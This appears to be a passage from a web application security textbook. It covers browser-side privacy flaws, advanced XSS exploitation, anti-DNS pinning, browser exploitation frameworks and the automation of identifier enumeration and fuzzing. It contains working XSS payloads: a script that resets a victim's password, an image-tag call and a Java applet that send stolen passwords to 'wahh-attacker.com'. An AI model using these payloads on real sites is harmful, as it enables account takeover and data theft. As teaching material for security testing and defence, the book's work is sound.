rise to a range of attacks to which insecure applications may leave their users

vulnerable. There are several areas in which this kind of attack may arise.

Persistent Cookies

Some applications store sensitive data in a persistent cookie, which most

browsers save on the local file system.

HACK STEPS

■ Review all of the cookies identified during your application mapping
exercises (see Chapter 4). If any Set-Cookie instruction contained an
expires attribute with a date that is in the future, this will cause the
browser to persist that cookie until that date. For example:

UID=d475dfc6eccca72d0e; expires=Wed, 12-Mar-08 16:08:29 GMT;

■ If a persistent cookie is set that contains any sensitive data, then a local

attacker may be able to capture this data. Even if a persistent cookie con-

tains an encrypted value, if this plays a critical role such as reauthenticat-

ing the user without entering credentials, then an attacker who captures

it will be able to resubmit it to the application without actually decipher-

ing its contents (see Chapter 6).
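When many cookies have been recorded, the first of these checks is easy to automate. The Python sketch below is a minimal illustration under stated assumptions: the function names are hypothetical, only the expires attribute is examined, and only the three date layouts listed in the code are recognized.

```python
from datetime import datetime, timezone

# Date layouts accepted for the expires attribute (an assumed, partial list).
_EXPIRES_FORMATS = (
    "%a, %d-%b-%y %H:%M:%S GMT",   # e.g. Wed, 12-Mar-08 16:08:29 GMT
    "%a, %d-%b-%Y %H:%M:%S GMT",
    "%a, %d %b %Y %H:%M:%S GMT",
)


def parse_expires(value):
    """Return the expiry as an aware datetime, or None if unrecognized."""
    for layout in _EXPIRES_FORMATS:
        try:
            parsed = datetime.strptime(value.strip(), layout)
        except ValueError:
            continue
        return parsed.replace(tzinfo=timezone.utc)
    return None


def is_persistent(set_cookie_value, now=None):
    """True if the cookie carries an expires date later than `now`."""
    now = now or datetime.now(timezone.utc)
    # Everything after the first ';' is an attribute such as expires or path.
    for attribute in set_cookie_value.split(";")[1:]:
        name, _, value = attribute.strip().partition("=")
        if name.lower() == "expires":
            expires = parse_expires(value)
            return expires is not None and expires > now
    return False
```

Any cookie flagged by is_persistent should then be reviewed by hand to decide whether its value is sensitive or can be replayed.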

Cached Web Content

Most browsers cache non-SSL web content unless a web site specifically

instructs them not to. The cached data is normally stored on the local file system.

HACK STEPS

■ For any application pages which are accessed over HTTP and which con-

tain sensitive data, review the details of the server’s response to identify

any cache directives.


■ The following directives will prevent browsers from caching a page. Note

that these may be specified within the HTTP response headers or within

HTML meta-tags:

Expires: 0

Cache-control: no-cache

Pragma: no-cache

■ If these directives are not found, then the page concerned may be vulner-

able to caching by one or more browsers. Note that cache directives are

processed on a per-page basis, and so every sensitive HTTP-based page

needs to be checked.

■ To verify that sensitive information is being cached, use a default instal-

lation of a standard browser, such as Internet Explorer or Firefox. In the

browser’s configuration, completely clean its cache and all cookies, and

then access the application pages that contain sensitive data. Review the

files that have appeared in the cache to see if any of these contain sensi-

tive data. If a large number of files are being generated, you can take a

specific string from a page’s source, and search the cache for that string.

■ The default cache locations for common browsers are:

    ■ Internet Explorer: Subdirectories of
      C:\Documents and Settings\{username}\Local Settings\Temporary Internet Files\Content.IE5

      Note that in Windows Explorer, to view this folder you need to enter this
      exact path and have hidden folders showing, or browse to the above
      folder from the command line.

    ■ Firefox (on Windows):
      C:\Documents and Settings\{username}\Local Settings\Application Data\Mozilla\Firefox\Profiles\{profile name}\Cache

    ■ Firefox (on Linux): ~/.mozilla/firefox/{profile name}/Cache
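Searching a cache directory for a string taken from a sensitive page can be scripted along the following lines. This Python sketch makes some simplifying assumptions: find_in_cache is a hypothetical helper, files are compared as raw bytes, and the marker is assumed to be stored uncompressed. If the browser stores a response in compressed form, a plain search like this will miss it.

```python
import os


def find_in_cache(cache_dir, marker):
    """Return the paths of cached files whose raw bytes contain `marker`."""
    needle = marker.encode("utf-8")
    matches = []
    for root, _dirs, files in os.walk(cache_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                with open(path, "rb") as handle:
                    if needle in handle.read():
                        matches.append(path)
            except OSError:
                continue  # locked or unreadable entries are skipped
    return sorted(matches)
```

Run it against the relevant cache location after browsing the sensitive pages with a freshly cleared cache, using a string that appears only in the page under test.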

Browsing History

Most browsers save a browsing history, which may include any sensitive data

transmitted in URL parameters.

HACK STEPS

■ Identify any instances within the application in which sensitive data is

being transmitted via a URL parameter.

■ If any cases exist, examine the browser history to verify that this data has

been stored there.
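If a list of requested URLs has been captured during mapping, a quick pass can highlight parameters that deserve this check. The following Python sketch is only a starting point: the set of parameter names is a hypothetical example and would need to be adapted to the application being tested.

```python
from urllib.parse import parse_qsl, urlsplit

# Hypothetical names that suggest sensitive content; extend as required.
SENSITIVE_NAMES = {"password", "passwd", "pwd", "token", "sessionid",
                   "ssn", "cardnumber"}


def sensitive_url_parameters(url):
    """Return the query string parameter names that look sensitive."""
    query = urlsplit(url).query
    return [name
            for name, _value in parse_qsl(query, keep_blank_values=True)
            if name.lower() in SENSITIVE_NAMES]
```

A match indicates only that the name looks interesting. Whether the value is actually sensitive, and whether it is recorded in the history, still has to be confirmed in the browser.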


Autocomplete

Many browsers implement a user-configurable autocomplete function for

text-based input fields, which may store sensitive data such as credit card

numbers, usernames, and passwords. Autocomplete data is stored within the

registry by Internet Explorer and on the file system by Firefox.

As already described, in addition to being accessible by local attackers, data

in the autocomplete cache can also be retrieved via an XSS attack in certain cir-

cumstances.

HACK STEPS

■ Review the HTML source code for any forms that contain text fields in

which sensitive data is captured.

■ If the attribute autocomplete=off is not set, either within the form tag

or the tag for the individual input field, then data entered will be stored

within browsers where autocomplete is enabled.
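This review can be partly automated with an HTML parser. The Python sketch below uses the standard html.parser module; the class and function names are hypothetical, and it assumes that only text and password inputs are of interest and that forms are not nested.

```python
from html.parser import HTMLParser


class AutocompleteAudit(HTMLParser):
    """Collect text and password inputs not covered by autocomplete=off."""

    def __init__(self):
        super().__init__()
        self.form_protected = False
        self.exposed_fields = []

    def handle_starttag(self, tag, attrs):
        raw = dict(attrs)
        protected = (raw.get("autocomplete") or "").lower() == "off"
        if tag == "form":
            self.form_protected = protected
        elif tag == "input":
            field_type = (raw.get("type") or "text").lower()
            if field_type in ("text", "password") and not (
                    protected or self.form_protected):
                self.exposed_fields.append(raw.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self.form_protected = False


def fields_without_autocomplete_off(html):
    """Return the names of input fields whose contents may be remembered."""
    audit = AutocompleteAudit()
    audit.feed(html)
    audit.close()
    return audit.exposed_fields
```

The result is a list of candidate field names. Deciding which of them capture sensitive data remains a manual judgment.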

Preventing Local Privacy Attacks

Applications should avoid storing anything sensitive in a persistent cookie.

Even if this data is encrypted, it can be resubmitted by an attacker who cap-

tures it.

Applications should use suitable cache directives to prevent sensitive data
from being stored by browsers. In ASP applications, the following instructions
will cause the server to include the required directives:

<% Response.CacheControl = "no-cache" %>
<% Response.AddHeader "Pragma", "no-cache" %>
<% Response.Expires = 0 %>

In Java applications, the following commands should achieve the same
result:

response.setHeader("Cache-Control", "no-cache");
response.setHeader("Pragma", "no-cache");
response.setDateHeader("Expires", 0);
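Whichever platform is used, it is worth confirming that the directives actually appear in the responses that carry sensitive data. The Python sketch below checks a set of response headers for the three directives discussed here. The function names are hypothetical, and one assumption goes beyond the text: an Expires header holding a date that has already passed is treated as equivalent to Expires: 0, because server frameworks commonly emit a date rather than a literal zero.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime


def _already_expired(value, now):
    """True for a literal 0 or for an HTTP date that is not in the future."""
    value = value.strip()
    if value == "0":
        return True
    if not value:
        return False
    try:
        when = parsedate_to_datetime(value)
    except (TypeError, ValueError, IndexError):
        return False  # unparseable values are treated as not expired
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when <= now


def missing_cache_directives(headers, now=None):
    """List which of the three anti-caching directives are absent."""
    now = now or datetime.now(timezone.utc)
    lowered = {name.lower(): value.lower() for name, value in headers.items()}
    missing = []
    if "no-cache" not in lowered.get("cache-control", ""):
        missing.append("Cache-Control: no-cache")
    if "no-cache" not in lowered.get("pragma", ""):
        missing.append("Pragma: no-cache")
    if not _already_expired(lowered.get("expires", ""), now):
        missing.append("Expires: 0")
    return missing
```

An empty list means that all three directives were found. The sketch inspects HTTP headers only and does not look at HTML meta-tags.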

Applications should never use URLs to transmit sensitive data, as these are
liable to be logged in numerous locations. All such data should be transmitted
using HTML forms that are submitted using the POST method.

In any instance where users enter sensitive data into text input fields, the
autocomplete=off attribute should be specified within the form or field tag.

Advanced Exploitation Techniques

This section does not describe any new categories of vulnerability that arise

within web applications. Rather, it describes some advanced techniques that may

be employed in the course of exploiting the vulnerabilities already examined.

Leveraging Ajax

We described earlier how Ajax techniques can be used to implement sophisti-

cated user interfaces that behave more like local desktop software than older

web applications ever could.

The ability of Ajax to carry out actions behind the scenes in a flexible and

powerful way makes it extremely attractive to someone seeking to attack other

users of an application. If an attacker has the ability to execute arbitrary

JavaScript within the browser of a victim user (for example, via an XSS vul-

nerability), then he can use Ajax techniques to perform arbitrarily complex

actions involving multiple requests to the vulnerable application.

You have already seen XMLHttpRequest being used to generate a TRACE
request to a web application that employed HttpOnly cookies. The following
example shows a more sophisticated attack in which two requests are made to
perform an action on behalf of a victim user. Suppose that a web application
allows authenticated users to view and update their account details, including
their current password, which is masked on-screen. If the application contains
an XSS flaw anywhere within its functionality, then an attacker can inject the
following script to reset the user’s password:

<script>
// Fetch the account page, which embeds the current password in a form field.
var request = new ActiveXObject("Microsoft.XMLHTTP");
request.open("GET", "http://wahh-app.com/ShowAccount.php", false);
request.send();
// Skip past the 17-character marker and read up to the closing quote.
var password = request.responseText.substring(
    request.responseText.indexOf("password\" value=\"") + 17);
password = password.substring(0, password.indexOf("\""));
// Submit the change-password form using the captured value.
request = new ActiveXObject("Microsoft.XMLHTTP");
request.open("POST", "http://wahh-app.com/ChangePassword.php", false);
request.send("oldPassword=" + password +
    "&newPassword=0wned&confirmPassword=0wned");
</script>

When this script is executed, the victim’s browser will first issue the
following request:

GET /ShowAccount.php HTTP/1.1
Host: wahh-app.com

which returns a form including the following field:

<input type="password" name="password" value="kemppike">

The script then parses out the value of the password field and causes the
victim’s browser to issue the following request:

POST /ChangePassword.php HTTP/1.1
Host: wahh-app.com
Content-Length: 60

oldPassword=kemppike&newPassword=0wned&confirmPassword=0wned

which results in the user’s password being reset to a value controlled by the
attacker. Both requests are issued by the script in the background, without any
obvious indication to the user that they have taken place. If the attack is
skillfully executed, the user will not know about it until the next time they
attempt to log in.

NOTE The example script shown works on Internet Explorer. A slightly more

complicated script could be created that worked on all common browsers.
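The parsing step in the script relies on a fixed offset of 17, which is simply the length of the marker string that precedes the value. The following Python sketch traces the same logic outside the browser. The sample field markup is an assumption chosen to be consistent with the marker the script searches for, and the function names are hypothetical. Unlike the injected script, the sketch checks for the case where the marker is absent.

```python
MARKER = 'password" value="'   # 17 characters, hence the + 17 in the script


def extract_password(page):
    """Return the text between the marker and the next double quote."""
    start = page.find(MARKER)
    if start == -1:
        return None  # marker absent: the page layout differs from the assumption
    rest = page[start + len(MARKER):]
    end = rest.find('"')
    return rest[:end] if end != -1 else None


def build_change_request_body(old_password, new_password):
    """Assemble the form body that the second request submits."""
    return ("oldPassword=" + old_password +
            "&newPassword=" + new_password +
            "&confirmPassword=" + new_password)
```

Applied to a field whose value is kemppike and a new password of 0wned, the resulting body is 60 bytes long, which matches the Content-Length header in the request shown above.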

The MySpace worm, which exploited a stored XSS vulnerability, employed

Ajax techniques, and provides a useful example of the kind of complex opera-

tions that can be carried out using this technology. The steps performed by the

worm’s payload included the following:

1. Parse the source code of the current page to extract the ID of the
MySpace user who is viewing it.

2. If the current page was issued by the domain profile.myspace.com,
switch the location to www.myspace.com with the same relative URL.
(The profile.myspace.com domain can only be used to view profiles,
while the www.myspace.com domain can also be used to add new friends
and perform other tasks. Because XMLHttpRequest can only be used to
make requests to the same domain that issued it, it is necessary to
switch domain before issuing requests to add friends.)

3. Parse the current page to extract the worm’s own source code, and
URL-encode it.

4. Make a GET request to the user’s Add Friend page to extract the
per-page token that it contains.

5. Make a POST request (including the per-page token) to the user’s Add
Friend page to add the worm’s author as a friend.

6. Make a GET request to the user’s Add Hero page to extract the per-page
token that it contains.

7. Make a POST request (including the per-page token) to the user’s Add
Hero page to add the worm’s author as a hero and also embed the
source code for the worm itself, so that it will propagate when other
people view the user’s profile.

Making Asynchronous Off-Site Requests

The browser’s same origin policy prevents XMLHttpRequest from being used
to make off-site requests, because this would enable a malicious web site to
retrieve and process data from other domains. Hence, in the earlier example,
the attacker could not use XMLHttpRequest to submit the user’s existing
password out to an external server which he controls. However, this restriction
can be circumvented by supplementing Ajax with other techniques.

There are numerous ways in which an injected script may cause arbitrary
captured data to be submitted to an external server. To generate a single
request, an image tag can be created with an arbitrary source URL. For
example, having parsed out the victim’s password from the account details page,
the attacker can transmit this to his server using the following JavaScript:

document.write("<img src=\"http://wahh-attacker.com/" + password + "\">");

By creating numerous such tags programmatically, it is possible to generate

asynchronous requests to an external server. Another way for an attacker to do

this is to call out to a Java applet from his injected code. For example, the

attacker can create an applet that implements the following method:

import java.applet.Applet;
import java.io.*;
import java.net.*;

// The class name matches the PhoneHome.class file that the page loads.
public class PhoneHome extends Applet
{
    // Sends the supplied string to the attacker's server in a POST request.
    public String phoneHome(String data)
    {
        try
        {
            URLConnection urlConn = new URL(
                "http://wahh-attacker.com/phonehome").openConnection();
            urlConn.setDoOutput(true);
            urlConn.setRequestProperty("Content-Type",
                "application/x-www-form-urlencoded");
            DataOutputStream dos = new DataOutputStream(
                urlConn.getOutputStream());
            dos.writeBytes(data);
            dos.flush();
            dos.close();
            // Requesting the response stream causes the buffered POST to be sent.
            DataInputStream input = new DataInputStream(
                urlConn.getInputStream());
            input.close();
        }
        catch (Exception e)
        {
            return e.getMessage();
        }
        return "data sent";
    }
}

This method accepts an arbitrary String as input, and generates a POST

request to the attacker’s server, containing this data.

The attacker can cause the victim’s browser to load the applet by inserting
the following HTML before his malicious script:

<applet codebase="http://wahh-attacker.com" code="PhoneHome.class"
id="theApplet"></applet>

The applet can then be invoked from the attacker’s script to issue asynchro-

nous requests, as follows:

theApplet.phoneHome(password);

Despite the various security restrictions imposed by the browser’s same ori-

gin policy, this technique is successful because:

■■ HTML documents may load Java applets from any domain.

■■ The applet is loaded from wahh-attacker.com and only ever
communicates back to wahh-attacker.com.

■■ XMLHttpRequest is only ever used to communicate to wahh-app.com,
from where the attacker’s script was loaded.

■■ Any JavaScript on an HTML page may invoke the public methods of
any applet loaded by the page.

Anti-DNS Pinning

Anti-DNS pinning is a technique that can be used to perform a partial breach

of same origin restrictions in some situations, enabling a malicious web site to

interact with a different domain.


A Hypothetical Attack

To understand what DNS pinning is, and why it is necessary, let us first imag-

ine a world in which it does not exist. Suppose that a malicious web site wishes

to retrieve and process data from a different domain. Without DNS pinning,

this attack could be achieved through the following steps:

1. An unwitting user follows a link to the URL http://wahh-attacker.com/.

2. The user’s browser resolves the domain name wahh-attacker.com. To
do this, it performs a DNS lookup on the attacker’s name server. The
name server responds with the IP address of the attacker’s web server
(1.2.3.4), with a time to live (TTL) of one second.

3. The user’s browser issues the following request to IP address 1.2.3.4:

GET / HTTP/1.1
Host: wahh-attacker.com

4. The attacker’s web server returns a page containing a script that waits
for two seconds and then performs two actions. The first action is to use
XMLHttpRequest to retrieve http://wahh-attacker.com/. Because this
is the same domain that invoked the script, the request is permitted.

5. Because the browser has waited for two seconds, its previous DNS
lookup on wahh-attacker.com has now expired, and so the browser
performs a second lookup. This time, the attacker’s name server
responds with the IP address of wahh-app.com, which is 5.6.7.8.

6. The user’s browser issues the following request to IP address 5.6.7.8:

GET / HTTP/1.1
Host: wahh-attacker.com

7. The wahh-app.com server responds with its content, which the
attacker’s script is able to process via the XMLHttpRequest object.

8. The attacker’s script loaded in step 4 performs its second action, which
is to transmit the data retrieved in step 7 to a location controlled by the
attacker. Recall that any web site can issue a request to any other
domain, and in this case, the attacker’s script posts the captured data to
www2.wahh-attacker.com in the standard way.

The hypothetical attack just described succeeds in retrieving data across
domains; however, it only constitutes a partial breach of the browser’s same
origin policy. Crucially, in step 6 the user’s browser believes it is submitting a
request to the domain wahh-attacker.com, and this is the context in which the
request is made. Any cookies that the user has for the domain wahh-app.com,
such as session tokens, are not transmitted. This means that the content
retrieved in the attack will be the same as if the attacker had simply visited
http://wahh-app.com/ directly himself.

So what does the attack achieve? It is effective in retrieving content from

web sites which the user can access but which the attacker cannot. If the user

is on a corporate LAN, the attacker will be able to browse intranet sites on the

LAN. If the user is on a home DSL connection, the attacker will be able to com-

municate with the administrative interface on their router, which listens only

on the internal home network. The attacker can also interact with any web-

based services on the user’s own computer, even if these are protected by a

personal firewall. In these situations, the attacker can reach servers that are

defended by the network topology rather than by authentication and sessions.

A sophisticated attack could turn the user’s browser into an open proxy, allow-

ing the attacker to capture data from, and perform arbitrary actions against,

arbitrary targets. In many contexts, this could be a very serious threat.

DNS Pinning

It is specifically to prevent this kind of attack that DNS pinning exists. When
browsers resolve a domain name to an IP address, they cache the IP address
for the duration of the current browser session, regardless of the TTL value
specified in the response to the lookup. Hence, in step 5 of the hypothetical
attack, the browser will continue to associate wahh-attacker.com with the
original IP address 1.2.3.4, and so does not make any request to the server at
wahh-app.com. So the attack was only hypothetical after all.
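The difference between honoring the TTL and pinning the first answer can be seen in a small simulation. The Python sketch below is a toy model rather than a description of how any browser is implemented: both classes are hypothetical, and time is passed in explicitly as a number of seconds so that the behavior is repeatable.

```python
class AttackerNameServer:
    """Answers 1.2.3.4 on the first lookup and 5.6.7.8 afterwards, TTL 1s."""

    def __init__(self):
        self.lookups = 0

    def resolve(self, hostname):
        self.lookups += 1
        address = "1.2.3.4" if self.lookups == 1 else "5.6.7.8"
        return address, 1  # (IP address, time to live in seconds)


class BrowserResolver:
    """Caches lookups; with pinning enabled the first answer never expires."""

    def __init__(self, name_server, pinning):
        self.name_server = name_server
        self.pinning = pinning
        self.cache = {}  # hostname -> (address, expiry time)

    def lookup(self, hostname, now):
        cached = self.cache.get(hostname)
        if cached is not None:
            address, expires_at = cached
            if self.pinning or now < expires_at:
                return address
        address, ttl = self.name_server.resolve(hostname)
        self.cache[hostname] = (address, now + ttl)
        return address
```

Without pinning, a lookup at time 0 returns 1.2.3.4 and a second lookup two seconds later returns 5.6.7.8, as in steps 2 and 5 of the hypothetical attack. With pinning enabled, both lookups return 1.2.3.4 and the name server is consulted only once.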

Attacks against DNS Pinning

Or was it?

In August 2006, Martin Johns discovered that DNS pinning can be defeated
by rejecting HTTP connections. In step 5 of the attack, the user’s browser
enforces DNS pinning and so makes the subsequent request to the original IP
address 1.2.3.4. However, if the attacker’s server rejects this connection
attempt (for example, by firewalling its HTTP port), then the user’s browser
drops the DNS pinning and performs a fresh lookup on wahh-attacker.com.
At this point, the attacker responds with the IP address 5.6.7.8 and the attack
proceeds as originally described. This behavior means that the protection
offered by DNS pinning can be trivially defeated by any serious attacker.

A second defect in the reliance on DNS pinning defenses is that they do not
protect users who access the Internet via a proxy server. In this situation, DNS
resolution is performed by the proxy, not the browser. Hence, browser-based
DNS pinning is irrelevant, and the hypothetical attack originally described is
fully effective. For further details, see the following paper:

http://www.ngssoftware.com/research/papers/DnsPinningAndWebProxies.pdf

A further twist in the DNS pinning story relates to the HTTP Host header.
Notice that in step 6, the request to the wahh-app.com web server contains the
domain wahh-attacker.com in its Host header, because the user’s browser still
believes it is accessing the attacker’s domain. This means that web sites could
seek to defend against anti-DNS pinning by checking the Host header in all
requests and rejecting those specifying a different domain. However, an
attacker can spoof an arbitrary Host header in various ways, either via
XMLHttpRequest itself on older browsers or through older versions of Flash.
Hence, checking the Host header should not be considered a reliable means of
thwarting anti-DNS pinning attacks. The only failsafe method is to ensure that
sensitive web content is protected by effective authentication and sessions,
regardless of any defenses imposed by the network topology.
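For completeness, the Host header check mentioned above amounts to very little code, which is part of its appeal. The Python sketch below shows one way it might be written. The function name is hypothetical, the set of expected hosts is assumed to be held in lowercase, and IPv6 literals are not handled. As the discussion makes clear, a check like this is at best a supplementary measure and is no substitute for authentication and session handling.

```python
def host_header_allowed(host_header, expected_hosts):
    """Accept a request only if its Host header names one of our domains."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    # Drop an optional port; bracketed IPv6 literals are out of scope here.
    if ":" in host and not host.startswith("["):
        host = host.rsplit(":", 1)[0]
    return host in expected_hosts
```

In step 6 of the hypothetical attack, the request reaching wahh-app.com carries Host: wahh-attacker.com, so this function would reject it unless the attacker had found a way to spoof the header.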

Note that because an attacker performing anti-DNS pinning can gain full

two-way interaction with a target web application, he can perform any of the

attacks that are possible against applications on the public Internet. Hence,

organizations hosting applications internally on protected networks should

ensure that they are robustly defended against common web application

attacks, in the same way as if those applications were accessible directly from

the Internet.

Browser Exploitation Frameworks

Various frameworks have been developed to demonstrate and exploit the vari-

ety of possible attacks that may be carried out against end users on the Inter-

net. These typically require a JavaScript hook to be placed into the browser of

a victim, via some vulnerability such as XSS. Once the hook is in place, the

browser contacts a server controlled by the attacker, and may poll this server

periodically, submitting data back to the attacker and providing a control

channel for receiving commands from the attacker.

Actions which may be carried out within this type of framework include the

following:

■■ Logging keystrokes and sending these to the attacker.

■■ Capturing clipboard contents and sending these to the attacker.

■■ Hijacking the user’s session with the vulnerable application.

■■ Fingerprinting the victim’s browser and exploiting known browser
vulnerabilities accordingly.

■■ Performing port scans of other hosts (which may be on a private
network accessible by the compromised user’s browser), and sending the
results to the attacker.

■■ Attacking other web applications accessible via the compromised user’s
browser, by forcing the browser to send malicious requests.

■■ Brute forcing the user’s browsing history and sending this to the
attacker.

One example of a sophisticated browser exploitation framework is BeEF,
which was developed by Wade Alcorn and implements the preceding
functionality. Figure 12-13 shows BeEF capturing information from a compromised
user, including computer details, the URL and page content currently
displayed, and keystrokes entered by the user.

Figure 12-13: Data captured from a compromised user by BeEF

Figure 12-14 shows BeEF performing a port scan of the victim user’s own

computer.

Figure 12-14: BeEF performing a port scan of a compromised user’s computer


Another highly functional browser exploitation framework is XSS Shell, pro-

duced by SecuriTeam. This provides a wide range of functions for manipulat-

ing zombie hosts compromised via XSS, including capturing of keystrokes,

clipboard contents, mouse movements, screenshots, and URL history, as well as

the injection of arbitrary JavaScript commands. It also remains resident within

the user’s browser if she navigates to other pages within the application.

Chapter Summary

We have examined a huge variety of ways in which defects in a server-side

web application may leave its users exposed to malicious attack. Many of

these vulnerabilities are complex to understand and discover, and often neces-

sitate an amount of investigative effort that exceeds their actual significance as

the basis for a worthwhile attack. Nevertheless, it is common to find that lurk-

ing among a large number of uninteresting client-side flaws is a serious vul-

nerability that can be leveraged to attack the application itself. In many cases,

the effort is worth it.

Further, as awareness of web application security continues to evolve, direct

attacks against the server component itself are likely to become less straight-

forward to discover or to execute. Attacks against other users, for better or

worse, are certainly part of everyone’s future.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. What is the standard “signature” in an application’s behavior that can

be used to identify most instances of XSS vulnerabilities?

2. You discover a reflected XSS vulnerability within the unauthenticated

area of an application’s functionality. State two different ways in which

the vulnerability could be used to compromise an authenticated session

within the application.

3. You discover that the contents of a cookie parameter are copied without

any filters or sanitization into the application’s response. Can this

behavior be used to inject arbitrary JavaScript into the returned page?

Can it be exploited to perform an XSS attack against another user?

4. You discover stored XSS behavior within data that is only ever displayed

back to yourself. Does this behavior have any security significance?

5. You are attacking a web mail application that handles file attachments

and displays these in-browser. What common vulnerability should you

immediately check for?


6. How does the browser’s same origin policy impinge upon the use of
the Ajax technology XMLHttpRequest?

7. Name three possible attack payloads for XSS exploits (that is, the
malicious actions that you can perform within another user’s browser, not
the methods by which you deliver the attacks).

8. You discover a function which copies the value of some user-supplied
data into the target of an image tag:

The data is stored within the application and will be returned to other
authenticated users who view the relevant page. The application is
HTML-encoding the < and > characters, preventing you from breaking
out of the image tag. What two categories of attack can you perform?

9. You have discovered a reflected XSS vulnerability where you can inject
arbitrary data into a single location within the HTML of the returned
page. The data inserted is truncated to 50 bytes, but you want to inject a
lengthy script. You prefer not to call out to a script on an external
server. How can you work around the length limit?

10. You discover a reflected XSS flaw in a request that must use the POST
method. What delivery mechanisms are feasible for performing an attack?

11. How can an attacker make use of the TRACE method to facilitate an XSS
attack?

12. You discover an application function where the contents of a query
string parameter are inserted into the Location header in an HTTP
redirect. What three different types of attacks can this behavior potentially
be exploited to perform?

13. Your very first request to a banking application returns HTML like the

following:

</frameset>

What vulnerability can you immediately diagnose here, without per-

forming any further testing?

14. What is the main precondition that must exist to enable an XSRF attack

against a sensitive function of an application?

15. What three defensive measures can each be used to prevent JSON

hijacking attacks?

CHAPTER 13

Automating Bespoke Attacks

This chapter does not introduce any new categories of vulnerability. Rather,
we will be examining one key element in an effective methodology for hacking
web applications: the use of automation to strengthen and accelerate
bespoke attacks. The range of techniques involved can be applied throughout
the application and to every stage of the attack process, from initial mapping
to actual exploitation.

Every web application is different. Attacking an application effectively
involves using various manual procedures and techniques to understand its
behavior and probe for vulnerabilities. It also entails bringing to bear your
experience and intuition in an imaginative way. Attacks are typically bespoke,
or custom-made, in nature, tailored to the particular behavior you have
identified, and the specific ways in which the application enables you to interact
with and manipulate it. Performing bespoke attacks manually can be
extremely laborious and is prone to mistakes. The most successful web
application hackers take their bespoke attacks a step further, and find ways of
automating these to make them easier, faster, and more effective.

In this chapter, we will describe a proven methodology for automating
bespoke attacks. This methodology combines the virtues of human
intelligence and computerized brute force, usually with devastating results.

Uses for Bespoke Automation

There are three main situations in which bespoke automated techniques can be

employed to assist you in attacking a web application:

■■

Enumerating identifiers — Most applications use various kinds of

names and identifiers to refer to individual items of data and resources,

such as account numbers, usernames, and document IDs. It is fre-

quently the case that you need to iterate through a very large number of

potential identifiers, to enumerate which ones are valid or worthy of

further investigation. In this situation, you can use automation in a

fully bespoke way to work through a list of possible identifiers or cycle

through the syntactic range of identifiers believed to be in use by the

application.

An example of an attack to enumerate identifiers would be where an

application uses a page number parameter to retrieve specific content:

https://wahh-app.com/app/showPage.jsp?PageNo=244197

In the course of browsing through the application, you discover a large
number of valid PageNo values, but to identify every valid value you
need to cycle through the entire range, something you cannot feasibly
do manually.

■■

Harvesting data — There are many kinds of web application vulnera-

bilities that enable you to extract useful or sensitive data from the appli-

cation using specific crafted requests. For example, a personal profile

page may display the personal and banking details of the current user

and indicate that user’s privilege level within the application. Through

an access control defect, you may be able to view the personal profile

page of any application user — but only one user at a time. To harvest

this data for every user might require thousands of individual requests.

Rather than working manually, you can use a bespoke automated

attack to quickly capture all of this data in a useful form.

An example of harvesting useful data would be to extend the enumera-

tion attack described previously. Instead of simply confirming which

PageNo values are valid, your automated attack could extract the con-

tents of the HTML title tag from each page it retrieves, enabling you to

quickly scan the list of pages for those that are most interesting.

■■

Web application fuzzing — In describing the practical steps for detect-

ing common web application vulnerabilities, we have seen numerous

examples where the best approach to detection is to submit various

unexpected items of data and attack strings, and review the applica-

tion’s responses for any anomalies that indicate that the flaw may be

present. In a large application, your initial mapping exercises may iden-

tify dozens of distinct requests which you need to probe, each contain-

ing numerous different parameters. To test each case manually is

time-consuming and mind-numbing, and liable to leave a large part of

the attack surface neglected. Using bespoke automation, however, you

can very quickly generate huge numbers of requests containing com-

mon attack strings, and quickly assess the server’s responses to home in

on interesting cases that merit further investigation. This technique is

often referred to as fuzzing.

We will examine in detail each of these three situations, and the ways in

which bespoke automated techniques can be leveraged to vastly enhance your

attacks against an application.

Enumerating Valid Identifiers

In the course of describing various common vulnerabilities and attack tech-

niques, we have encountered numerous situations in which the application

employs a name or identifier for some item, and your task as an attacker is to

discover some or all of the valid identifiers in use. Some examples of where

this requirement can arise are:

■■

The application’s login function returns informative messages that dis-

close whether a failed login was the result of an unrecognized user-

name or incorrect password. By iterating through a list of common

usernames and attempting to log in using each one, you can narrow the

list down to those that you know to be valid. This list can then be used

as the basis for a password guessing attack.

■■

Many applications use identifiers to refer to individual resources that

are processed within the application, such as document IDs, account

numbers, employee numbers, and log entries. Often, the application

will expose some means of confirming whether a specific identifier is

valid. By iterating through the syntactic range of identifiers in use, you

can obtain a comprehensive list of all these resources.

■■

If the session tokens generated by the application can be predicted, you

may be able to hijack other users’ sessions simply by extrapolating from

a series of tokens issued to you. Depending on the reliability of this

process, you may need to test a large number of candidate tokens for

each valid value that is confirmed.

The Basic Approach

Your first task in formulating a bespoke automated attack to enumerate valid

identifiers is to locate a request/response pair which has the following charac-

teristics:

■■

The request includes a parameter containing the identifier that you are
targeting. For example, in a function that displays a stored document,
the request might contain the parameter docID=3801.

■■

The server’s response to this request varies in a systematic way
when you vary the parameter’s value. For example, if a valid docID is
requested, the server might return a long response containing the
specified document’s contents. If an invalid value is requested, it might
return a short response containing the string Invalid document ID.

Having located a suitable request/response pair, the basic approach

involves submitting a large number of automated requests to the application,

either working through a list of potential identifiers, or iterating through the

syntactic range of identifiers known to be in use. The application’s responses

to these requests are monitored for “hits,” indicating that a valid identifier was

submitted.

Detecting Hits

There are numerous attributes of responses in which systematic variations

may be detected, and which may therefore provide the basis for an automated

attack.

HTTP Status Code

Many applications return different status codes in a systematic way depend-

ing on the values of submitted parameters. The values that are most com-

monly encountered during an attack to enumerate identifiers are:

■■

200 – The default response code, meaning “ok.”

■■

301 or 302 – A redirection to a different URL.

■■

401 or 403 – The request was not authorized or allowed.

■■

404 – The requested resource was not found.

■■

500 – The server encountered an error when processing the request.

Response Length

It is common for dynamic application pages to construct responses using a

page template (which has a fixed length), and insert per-response content into

this template. If the per-response content does not exist or is invalid (e.g., an

incorrect document ID was requested), the application might simply return an

empty template. In this situation, the response length is a reliable indicator of

whether a valid document ID has been identified.

In other situations, different response lengths may point towards the occur-

rence of an error or the existence of additional functionality. In the authors’

experience, the HTTP status code and response length indicators have been

found to provide a highly reliable means of identifying anomalous responses

in the majority of cases.

Response Body

It is very common for the data actually returned by the application to contain

literal strings or patterns that can be used to detect hits. For example, when an

invalid document ID is requested, the response might contain the string

Invalid document ID. In some cases, where the HTTP response code does not

